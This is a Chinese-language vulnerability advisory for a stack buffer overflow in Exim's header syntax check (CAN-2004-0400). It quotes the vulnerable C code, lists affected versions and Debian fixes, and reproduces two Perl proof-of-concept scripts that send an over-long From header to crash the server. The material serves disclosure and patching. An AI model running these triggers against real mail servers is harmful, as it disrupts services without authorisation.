Exim头语法检查远程堆栈缓冲区溢出漏洞 (Other,缺陷)

ufo2000

涉及程序：
Exim

描述：
Exim头语法检查远程堆栈缓冲区溢出漏洞

详细：
Exim是一款流行的EMAIL服务器(MTA)。

Exim在exim.conf配置文件中设置headers_check_syntax选项时检查头时没有正确检查缓冲区边界，远程攻击者可以利用这个漏洞发送恶意邮件，诱使Exim处理，触发缓冲区溢出。

在exim 3.35的accept.c和exim 4.32的verify.c中：

---
char hname[64];
char *t = h->text;
char *tt = hname;
char *verb = "is";
int len;

while (*t != ':') *tt++ = *t++;
*tt = 0;
---

如果exim 3.35的exim.conf文件中包含"headers_check_syntax"和exim 4.32中包含"require verify       = header_syntax" 选项，由于没有对"t"限制长度，可造成缓冲区溢出，目前还不知道是否可用于执行任意指令。

受影响系统：
University of Cambridge Exim 4.32
University of Cambridge Exim-tls 3.35
University of Cambridge Exim 3.35
   - Debian Linux 3.0

攻击方法：
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Georgi Guninski （guninski@guninski.com）提供了如下测试方法：

----exi2.pl----------------------------------
#!/usr/bin/perl
# works if headers_check_syntax is in exim.conf
# written by georgi guninski
# cannot be used in vulnerability databases

print "HELO a\r\nMAIL FROM: BillGay\@localhost\r\nRCPT TO: SteveNoBall\@localhost\r\n";
print "DATA\r\n";
my $ch=getc();
print "From" . " " x 275 . ":" ."vv v \r\n";
print "asdasd\r\n";
print "\r\n";
print ".\r\n";
print "QUIT\r\n";
---------------------------------------------


----exi3.pl----------------------------------
#!/usr/bin/perl

use IO::Socket;

my $port = $ARGV[1];
my $host = $ARGV[0];

# written by georgi guninski
# cannot be used in vulnerability databases
print "Written by georgi guninski\nCannot be used in vulnerability databases or CVE\n";

my $repl;
my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || die "socket";

$repl= <$socket>;
print "server replied ${repl}";
my $req = "HELO a\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";


my $fromaddr="BillGay\@soft";
my $touser="SteveNoBall\@soft";

$req = "MAIL FROM: ${fromaddr}\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";

$req = "RCPT TO: ${touser}\r\n";
syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";
$req = "DATA\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";

print "Attached with debugger to exim and press enter\n";
my $ccc=getc();

$req = "From" . " " x 200 . ":" ." root\r\n";

$req .= "just to let you know that you sux\r\n";
$req .= ".\r\n";

syswrite($socket,$req,length($req));
$repl= <$socket>;
print "server replied ${repl}";



while(<$socket>)
{
print $_;
}


close $socket;

解决方案：
Debian已经为此发布了两个安全公告（DSA-501-1和DSA-502-1）以及相应补丁:
DSA-501-1：New exim packages fix buffer overflows
链接：http://www.debian.org/security/2002/dsa-501
DSA-502-1：New exim-tls packages fix buffer overflows
链接：http://www.debian.org/security/2002/dsa-502

附加信息：
BUGTRAQ ID: 10291
CVE(CAN) ID: CAN-2004-0400